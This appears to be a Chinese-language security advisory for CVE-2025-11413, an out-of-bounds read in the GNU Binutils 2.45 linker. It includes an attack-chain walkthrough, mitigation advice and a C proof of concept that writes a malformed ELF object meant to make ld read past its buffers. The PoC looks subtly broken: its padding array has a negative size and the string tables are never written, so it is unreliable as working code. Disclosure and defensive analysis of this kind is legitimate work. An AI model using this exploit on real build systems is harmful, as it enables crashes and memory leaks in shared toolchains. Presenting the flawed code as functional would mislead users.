CVE-2025-11413：GNU Binutils链接器越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11413

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GNU Binutils

漏洞概述

CVE-2025-11413是GNU Binutils 2.45版本中链接器组件存在的一个安全漏洞。该漏洞位于bfd/elflink.c文件的elf_link_add_object_symbols函数中，属于链接器（Linker）组件的安全缺陷。攻击者可以通过精心构造的ELF目标文件触发越界读取操作，导致程序读取超出分配内存边界的数据。

根据CVSS 3.1评分体系，该漏洞评分为3.3分，属于低危级别。漏洞的攻击向量为本地攻击（AV:L），需要低权限（PR:L）即可利用，且无需用户交互（UI:N）。该漏洞对机密性影响较低（C:L），对完整性无影响（I:N），但对可用性存在低程度影响（A:L），可能导致链接器崩溃或异常终止。

该漏洞已被公开披露，相关的概念验证（PoC）利用代码已公开发布在互联网上，潜在攻击者可以较为容易地获取利用方式。GNU Binutils作为广泛使用的二进制工具集合，被众多软件开发流程、编译工具链以及安全分析工具所依赖，因此该漏洞的影响范围较为广泛。建议所有使用受影响版本的用户尽快升级到2.46或更高版本以消除安全风险。

技术细节

该漏洞的根本原因在于GNU Binutils 2.45版本的链接器组件中，elf_link_add_object_symbols函数在处理ELF目标文件的符号表时存在边界检查缺陷。具体而言，当链接器解析并合并多个ELF目标文件中的符号信息时，elf_link_add_object_symbols函数未能充分验证输入数据的合法性，导致在特定条件下会发生数组或缓冲区越界读取。

从技术层面分析，ELF（Executable and Linkable Format）文件格式包含符号表（Symbol Table）、节区头表（Section Header Table）等数据结构。链接器在处理这些结构时，需要根据节区头表中的索引来访问符号表项。如果恶意构造的ELF文件中包含了异常的节区头信息（如sh_size、sh_link、sh_info等字段被篡改），则可能导致链接器在计算符号表项偏移量时发生越界。

利用方式方面，攻击者需要具备本地系统的低权限访问能力，构造一个恶意的ELF目标文件，然后使用受影响的ld链接器进行链接操作。当链接器处理该恶意文件时，会触发越界读取，可能导致以下后果：1）程序崩溃（段错误），影响系统可用性；2）信息泄露，读取到相邻内存区域中的敏感数据；3）在特定环境下，可能为后续攻击提供信息收集的基础。

该漏洞的修复补丁编号为72efdf166aa0ed72ecc69fc2349af6591a7a19c0，通过增加适当的边界检查和输入验证逻辑来解决此问题。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在目标系统上拥有本地低权限账户，并确认系统使用的GNU Binutils版本为2.45（受影响版本）。可通过运行'ld --version'或'binutils --version'进行版本确认。

STEP 2

步骤2：构造恶意ELF文件

攻击者精心构造一个恶意的ELF目标文件（.o文件），该文件包含异常的节区头表信息，特别是符号表节区（.symtab）的sh_link和sh_info字段被设置为无效值，导致链接器在处理时计算错误的偏移量。

STEP 3

步骤3：触发链接操作

攻击者使用受影响的ld链接器对恶意ELF文件执行链接操作，例如运行'ld crafted_malicious.o'或将其作为更大构建过程的一部分。链接器调用elf_link_add_object_symbols函数处理符号表时，由于边界检查不足，发生越界读取。

STEP 4

步骤4：漏洞影响

越界读取导致链接器访问超出分配内存边界的数据，可能造成程序崩溃（段错误）、敏感信息泄露（读取相邻内存数据），或为后续攻击提供信息收集的基础。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2025-11413 PoC - GNU Binutils elf_link_add_object_symbols OOB Read
 * This PoC demonstrates triggering an out-of-bounds read in the linker
 * by crafting a malicious ELF object file with corrupted section headers.
 *
 * Usage: gcc -o poc poc.c && ./poc && ld crafted_malicious.o
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <elf.h>
#include <fcntl.h>
#include <unistd.h>

/* Create a minimal malicious ELF object file with corrupted
 * symbol table section headers to trigger OOB read in
 * elf_link_add_object_symbols() in bfd/elflink.c */
int create_malicious_elf(const char *filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) return -1;

    /* ELF64 header */
    Elf64_Ehdr ehdr;
    memset(&ehdr, 0, sizeof(ehdr));
    ehdr.e_ident[0] = 0x7f;
    ehdr.e_ident[1] = 'E';
    ehdr.e_ident[2] = 'L';
    ehdr.e_ident[3] = 'F';
    ehdr.e_ident[4] = ELFCLASS64;
    ehdr.e_ident[5] = ELFDATA2LSB;
    ehdr.e_ident[6] = EV_CURRENT;
    ehdr.e_type = ET_REL;  /* Relocatable file */
    ehdr.e_machine = EM_X86_64;
    ehdr.e_version = EV_CURRENT;
    ehdr.e_ehsize = sizeof(Elf64_Ehdr);
    ehdr.e_shentsize = sizeof(Elf64_Shdr);
    ehdr.e_shnum = 4;  /* NULL + .symtab + .strtab + .shstrtab */
    ehdr.e_shstrndx = 3;

    /* Section headers start after ELF header */
    ehdr.e_shoff = sizeof(Elf64_Ehdr);

    fwrite(&ehdr, sizeof(ehdr), 1, fp);

    /* Section headers with corrupted symbol table info */
    Elf64_Shdr shdrs[4];
    memset(shdrs, 0, sizeof(shdrs));

    /* SHT_NULL */
    shdrs[0].sh_type = SHT_NULL;

    /* .symtab - crafted with invalid sh_link and sh_info to trigger OOB */
    shdrs[1].sh_type = SHT_SYMTAB;
    shdrs[1].sh_offset = 256;
    shdrs[1].sh_size = 64;  /* Small size but large number of entries */
    shdrs[1].sh_link = 0xFFFF;  /* Invalid section index */
    shdrs[1].sh_info = 0xFFFF;  /* Invalid - causes OOB read */
    shdrs[1].sh_entsize = sizeof(Elf64_Sym);

    /* .strtab */
    shdrs[2].sh_type = SHT_STRTAB;
    shdrs[2].sh_offset = 320;
    shdrs[2].sh_size = 16;

    /* .shstrtab */
    shdrs[3].sh_type = SHT_STRTAB;
    shdrs[3].sh_offset = 336;
    shdrs[3].sh_size = 32;

    fwrite(shdrs, sizeof(shdrs), 1, fp);

    /* Padding to reach symbol table offset */
    char padding[256 - sizeof(Elf64_Ehdr) - sizeof(shdrs)];
    memset(padding, 0, sizeof(padding));
    fwrite(padding, 1, sizeof(padding), fp);

    /* Crafted symbol table entries - intentionally malformed */
    Elf64_Sym syms[2];
    memset(syms, 0, sizeof(syms));
    syms[0].st_name = 1;
    syms[0].st_info = STB_GLOBAL << 4;
    syms[0].st_shndx = SHN_UNDEF;
    syms[1].st_name = 5;
    syms[1].st_info = STB_GLOBAL << 4;
    syms[1].st_shndx = 0xFFFE;  /* Invalid section index */
    fwrite(syms, sizeof(syms), 1, fp);

    fclose(fp);
    return 0;
}

int main() {
    printf("[*] CVE-2025-11413 PoC - GNU Binutils OOB Read\n");
    printf("[*] Creating malicious ELF object file...\n");

    if (create_malicious_elf("crafted_malicious.o") != 0) {
        fprintf(stderr, "[-] Failed to create malicious ELF\n");
        return 1;
    }

    printf("[+] Malicious ELF created: crafted_malicious.o\n");
    printf("[*] Run: ld crafted_malicious.o to trigger the vulnerability\n");
    printf("[*] Expected: OOB read in elf_link_add_object_symbols()\n");

    return 0;
}

影响范围

GNU Binutils < 2.46

GNU Binutils 2.45

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制本地低权限用户对ld链接器的访问权限；2）对所有待链接的ELF目标文件进行来源验证，拒绝处理来源不明或未经验证的文件；3）在编译构建流程中加入ELF文件完整性校验步骤；4）使用seccomp或AppArmor等安全模块限制链接器的系统调用范围，减少越界读取可能造成的进一步影响；5）监控系统日志，关注链接器异常崩溃事件，及时发现潜在的攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11413
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11413
3 Details https://www.cvedetails.com/cve/CVE-2025-11413/
4 VulDB https://vuldb.com/cve/CVE-2025-11413
5 Link https://sourceware.org/bugzilla/attachment.cgi?id=16362
6 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33452
7 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33456#c10
8 Link https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=72efdf166aa0ed72ecc69fc2349af6591a7a19c0
9 Link https://vuldb.com/?ctiid.327349
10 Link https://vuldb.com/?id.327349
11 Link https://vuldb.com/?submit.665587
12 Link https://vuldb.com/?submit.665590
13 Link https://www.gnu.org/
14 Link https://cert-portal.siemens.com/productcert/html/ssa-082556.html